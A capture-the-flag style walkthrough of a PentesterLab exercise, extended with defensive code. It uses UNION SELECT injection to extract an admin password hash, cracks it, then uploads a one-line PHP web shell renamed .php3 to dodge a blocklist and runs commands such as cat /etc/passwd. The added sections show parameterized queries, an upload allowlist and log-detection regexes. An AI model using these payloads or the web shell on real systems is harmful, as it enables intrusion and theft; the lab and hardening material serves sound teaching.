SQL Injection to Shell
This exercise used a vulnerable machine provided by PenTester Labs (https://pentesterlab.com). The goal of this exercise was to use SQL injection in a PHP based website to examine how an attacker gains access to the administration pages. The only other resource used to complete this exercise was a hash decrypter found at https://hashkiller.co.uk/md5-decrypter.aspx.
Structured Query Language (SQL), according to http://sqlcourse.com:
"SQL stands for Structured Query Language. SQL is used to communicate with a database. According to ANSI (American National Standards Institute), it is the standard language for relational database management systems. SQL statements are used to perform tasks such as update data on a database, or retrieve data from a database. Some common relational database management systems that use SQL are: Oracle, Sybase, Microsoft SQL Server, Access, Ingres, etc. Although most database systems use SQL, most of them also have their own additional proprietary extensions that are usually only used on their system. However, the standard SQL commands such as "Select", "Insert", "Update", "Delete", "Create", and "Drop" can be used to accomplish almost everything that one needs to do with a database. This tutorial will provide you with the instruction on the basics of each of these commands as well as allow you to put them to practice using the SQL Interpreter."
According to OWASP (https://www.owasp.org/index.php/SQL_Injection):
"A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands."
With this understanding, let's jump right into this exploit. The image below depicts the homepage of the vulnerable web application.

To start, I clicked on the Landscape tab to see that the website uses PHP.

Next, I began playing with the URL parameters. Given that the landscape page had the id parameter equal to 1, I decided to see whether setting id=3-2 would return the same result.

I then decided to explore the next page, Sunsets. The id in the URL parameter for this page was equal to 2.

I decided to see what results would be returned if I manipulated the URL parameter to id=1+1.
Even though this returned an error, I was able to ascertain that this website is running a MySQL database. I decided to see what other parameters I could pass and what information I could extract. I first decided to use the UNION SELECT commands to see if I could determine the number of rows in the database. I ran this a few times before I found that there were 4 rows. The images below show the results of the failed attempt at determining the row count, followed by the successful injection.

The successful injection (as seen below) returned the page, demonstrating that the parameter injection was accepted.

Next, I decided to see if I could determine the version of the MySQL database running by injecting union select 1,@@version,3,4 in the URL parameter. The returned results showed that the web application is running MySQL version 5.7.17 (as seen below).

The next query I ran was to determine the user name. This was accomplished by injecting union select 1,user(),3,4 in the URL parameter (as seen below).

The last query I ran using the union select command was to determine the database name. This was accomplished by injecting union select 1,database(),3,4 in the URL parameter (as seen below).

To determine the column size, I used the command order by. To start, I tried using the command order by 10.

I continued to play with the parameters until I found that 4 worked.

To find more information about the table itself, I used the command union select 1,table_name,3,4 from information_schema.tables. The command union select 1,column_name,3,4 from information_schema.columns was also used to gather more information about the columns. This can be seen in the images below.

The columns returned the column names login and password.

My next objective was to find the login name from the users table. This was accomplished by using the command union select 1,login,3,4 from users.

The results show that the login name found in the users table is admin. The next goal was to extract the password for admin by using the command union select 1,password,3,4 from users.
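The bug behind the whole UNION SELECT chain above, shown as an added example that is not part of the original post or of the PentesterLab exercise: a constructed in-memory SQLite stand-in (the exercise uses MySQL; the users table with login and password columns comes from the write-up, the pictures table and its other column names are assumptions) in which the id parameter is concatenated into the query, beside a version that validates and binds it so the same payloads return nothing.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the exercise's database. The 4-column
    # pictures table is why the payloads pad with 1,X,3,4; users/login/password
    # are the names the write-up recovered, the rest are assumptions.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pictures (id INTEGER, title TEXT, filename TEXT, sort_order INTEGER);
        INSERT INTO pictures VALUES (1, 'Landscape', 'land.jpg', 1),
                                    (2, 'Sunsets', 'sun.jpg', 2);
        CREATE TABLE users (login TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'md5-hash-placeholder');
    """)
    return db


def vulnerable_lookup(db, id_param):
    # The flaw in the write-up: the raw id parameter is concatenated into the
    # statement, so arithmetic such as "3-2" is evaluated by the database and a
    # "1 UNION SELECT 1,login,3,4 FROM users" suffix becomes part of the query.
    sql = "SELECT id, title, filename, sort_order FROM pictures WHERE id = " + id_param
    return db.execute(sql).fetchall()


def safe_lookup(db, id_param):
    # Hardened form: enforce the expected type, then bind the value so whatever
    # the client sent is compared as data and never parsed as SQL.
    try:
        picture_id = int(id_param)
    except ValueError:
        return []  # reject anything that is not a plain integer id
    sql = "SELECT id, title, filename, sort_order FROM pictures WHERE id = ?"
    return db.execute(sql, (picture_id,)).fetchall()


# The two payloads from the write-up, with the leading id and UNION spelled out.
LOGIN_PAYLOAD = "1 UNION SELECT 1,login,3,4 FROM users"
PASSWORD_PAYLOAD = "1 UNION SELECT 1,password,3,4 FROM users"
```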

The results returned the hashed value of the password for the admin login. To recover this password, I used the hash decrypter found at https://hashkiller.co.uk/md5-decrypter.aspx. This matched the MD5 hash value to its plaintext and showed the password for the admin login in clear text as P4ssw0rd.

The next step was to log in as admin using the recovered password.


In order to get access, I wrote a simple PHP script:
<?php
// Runs whatever the cmd query parameter contains as a shell command on the server.
system($_GET['cmd']);
?>
The goal of this script is to get command line access to the server. I saved it as a PHP file and uploaded it to the server (as pictured below).


This upload failed. This could be because the server is blacklisting the upload of PHP files.

To attempt to bypass this blacklist, I used the same script, saved it as a PHP3 file type and tried to upload it again.


This upload proved to be successful.
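Why the PHP3 rename worked, and what the upload form should have done instead, as an added example that is not part of the original post or of the PentesterLab exercise: the blocklist below is an assumption modelled on the observed behaviour (.php refused, .php3 accepted), and the allowlist beside it checks extension, name shape and magic bytes together and stores the file under a generated name.

```python
import os
import secrets

# Blocklist in the spirit of the filter the exercise ran into (assumed; the
# write-up only shows that .php was refused and .php3 was accepted).
BLOCKED_EXTENSIONS = {".php"}


def blocklist_allows(filename):
    # Anything not on the list gets through, including .php3 and other
    # extensions the web server still hands to the PHP interpreter.
    return os.path.splitext(filename)[1].lower() not in BLOCKED_EXTENSIONS


# Allowlist: image extensions only, each tied to the magic bytes the content
# must start with, so neither the name nor the body alone decides the type.
ALLOWED_TYPES = {
    ".jpg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}


def allowlist_allows(filename, content):
    base = os.path.basename(filename)          # drop any directory component
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED_TYPES:
        return False
    if "." in stem:                            # refuse shell.php.jpg style names
        return False
    return content.startswith(ALLOWED_TYPES[ext])


def stored_name(filename):
    # Never store under the client-supplied name: keep only the vetted
    # extension and generate the rest, e.g. "a1b2...c3d4.jpg".
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(16) + ext
```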

Next, I opted to view the page source information and navigate to the test1.php3 file I had just uploaded.


I added the parameter cmd=uname, which returned the information shown in the image below.

To get more detailed information, I decided to include the -a flag after uname. The results can be seen below.

To confirm I had successfully penetrated the server and could send commands, I switched the parameter to cmd=cat /etc/passwd, which showed I had successfully gained access to the system.
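Every step of this write-up leaves a recognisable trace in the web server's access log, so as an added example (not part of the original post or of the PentesterLab exercise) here is a small scanner that URL-decodes each request and flags the UNION SELECT, information_schema/@@version, ORDER BY and cmd= probes used above; the sample log lines and the /gallery.php and /admin/uploads/ paths are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Indicators for the probes used in this exercise, matched against the
# URL-decoded request so "union%20select" and "union+select" are caught too.
RULES = [
    ("sqli-union", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("sqli-schema", re.compile(r"information_schema\.|@@version|\buser\(\)|\bdatabase\(\)", re.I)),
    ("sqli-orderby", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("webshell-cmd", re.compile(r"\.php\d?\?[^ ]*\bcmd=", re.I)),
]

# Common log format request line and status code.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def scan_log(lines):
    """Return (line_number, rule_name, status) for every indicator hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        path = unquote_plus(m.group("path"))
        for name, rx in RULES:
            if rx.search(path):
                hits.append((n, name, m.group("status")))
    return hits


# Constructed sample lines modelled on the steps in this write-up (not real logs).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /gallery.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /gallery.php?id=1+union+select+1,@@version,3,4 HTTP/1.1" 200 540',
    '10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /gallery.php?id=1%20order%20by%2010 HTTP/1.1" 500 220',
    '10.0.0.5 - - [01/Jan/2024:10:00:20 +0000] "GET /gallery.php?id=1+union+select+1,login,3,4+from+users HTTP/1.1" 200 530',
    '10.0.0.5 - - [01/Jan/2024:10:05:00 +0000] "GET /admin/uploads/test1.php3?cmd=uname+-a HTTP/1.1" 200 310',
]
```

A 500 on an ORDER BY probe followed by 200s on UNION requests from the same client is the sequence to alert on, since it mirrors the column-count probing that precedes data extraction.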
